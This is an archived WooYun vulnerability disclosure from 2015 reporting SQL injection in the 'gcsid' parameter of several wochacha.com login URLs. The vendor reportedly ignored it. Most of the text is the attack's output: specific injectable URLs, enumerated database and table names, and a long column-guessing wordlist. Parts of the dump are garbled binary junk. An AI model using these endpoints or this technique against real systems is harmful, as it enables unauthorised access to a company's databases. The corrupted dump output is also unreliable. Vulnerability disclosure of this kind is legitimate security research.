乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-07: 细节已通知厂商并且等待厂商处理中 2015-08-12: 厂商已经主动忽略漏洞,细节向公众公开
http://wap.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60
http://wphone.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60
http://symbian.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60
http://android.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60
不同站点,gcsid存在注入
available databases [8]:[*] `\t`[*] `\x02`[*] `\x02A``*] `gcore[*] gcoreinc[*] information_schema[*] mysql[*] securi
Database: gcore[3 tables]+----------------------------------------+| ! || ) || \x02 |+----------------------------------------+Database: gcoreinc[1 table]+----------------------------------------+| aow_ad i: |+----------------------------------------+Database: information_schema[28 tables]+----------------------------------------+| COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || PLUGIMS || POUTINES || PROCESSLIST || SESSION_SYATUS || SESSION_VzRIABLES || STATISTICS || TABLE_CONSTRAINTS || TABLE_CRIVILEHES || TABLrSC || TRIGGERSA || VIEaS || ?E&HCOLDJDVUSAGE || CFLLATIA| CHAACTER?QAEJ || COLJAR=OJ_CARACTER_SET_ALML40AB=LITY || GLBAANABDE> || GLOBALRQU || P>9SDIOLS || PROBHIA || RFEB )) || SCHEMA\x07\\?fd\\?ce\\?9a\\?ae\x08\x05 || SCHEMAuP\\?ff\x0cIVILEGES\x19 || qSER\x02\x18\x0ePRIVILEGES |+----------------------------------------+Database: mysql[23 tables]+----------------------------------------+| user || columns_priv || db || event || func || general_log || help_category || help_keyword || help_relation || help_topic || host || ndb_binlog_index || plugin || proc || procs_priv || servers || slow_log || tables_priv || time_zone || time_zone_leap_second || time_zone_name || time_zone_transition || time_zone_transition_type |+----------------------------------------+
+--------------------------+| e-mail || abfrsql || account || address_book_id || admin_psw || administrateur || adminname || adress || after || aide || akses || allno || allow || allowmodpost || answer_id || articleid || assigned_to || attachment || avatar || backlink || ban_id || basename || benutzer || blog_id || blogid || bp_id || bs_bid || bsm_id || c_commu_topic_id || cache_id || callstart || can_codice || candidato || cel || city || classid || clave || clients || cmtid || cod || cod_utente_mod || cognome || com || complet || confirm_id || consumidor || content || coupon || creditcard || cronid || cvvc || data_out || desd_xdecisao || dis_codigo || documento_id || eid || en || enugene || event_id || export_id || family || feed || feedid || file_id || fkidanagrafica || forumid || gap_codigo || gifi_accno || glmm || groupe || guy || header || hid || hidden_url || how || id_poll || id_product || id_tra || idapparlocom || idcapo || idcategoria || idcuore || idesameobiettivo || idevent || idgrouppermission || idkontakt || idreparto || idsmaglog || idstatocivile || idstelle || idsubscriptiontickets || idtipologiaricovero || imenu || include_date || institute_id || invisible || it_id || kat_id || key_id || kod || kode || kontakt || konto || kontr620 || kre1 || kunci || lahir || langid || loadmodule || location_id || login || login_admin || login_user || loginpas || loginpasswd || logins || mailid || manufacturer || matcode || mima || mod_custom || mod_mainmenu || mod_vm_cat_menu_specific || mopc || mossef || mosvote || mot_de_passe_bdd || n_dept || n_id || nama || namaakun || nazwisko || newsfeeds || nickname || nonnavigable || nowy || ns || object_link_a_id || ord_id || orderid || parole || part || paswd || pasword || platformid || pmid || po_id || polloptionid || pomoc || portachiavin || post_id || postdatetime || poster || prazo_xevento || prc_sconto1 || privmsgs_id || problem_code || prodid || product_list || productid || q_trid || readperm || reason || recommend_product_id || relid || sb_admin_name || schedaid || schet || schl || searchbot || searchstring || sessionid || skype || sql_text || standard || startnummer || state_id || struct_id || sub_comment4 || sub_image3 || sub_title4 || summaprihod || summary_id || sysuser || tags || taskid || templateid || texte || threadorder || timeid || title_id || tmp_lahir || user_group || user_login || user_username || users || uwierzytelnienia || vinod || vm_manufacturer || vorlnr || website || whabfragen || who || word_id || wuser || xgrupo || xprognostico || xrelatorio |+--------------------------+
↑
危害等级:无影响厂商忽略
忽略时间:2015-08-12 16:48
漏洞Rank:15 (WooYun评价)
暂无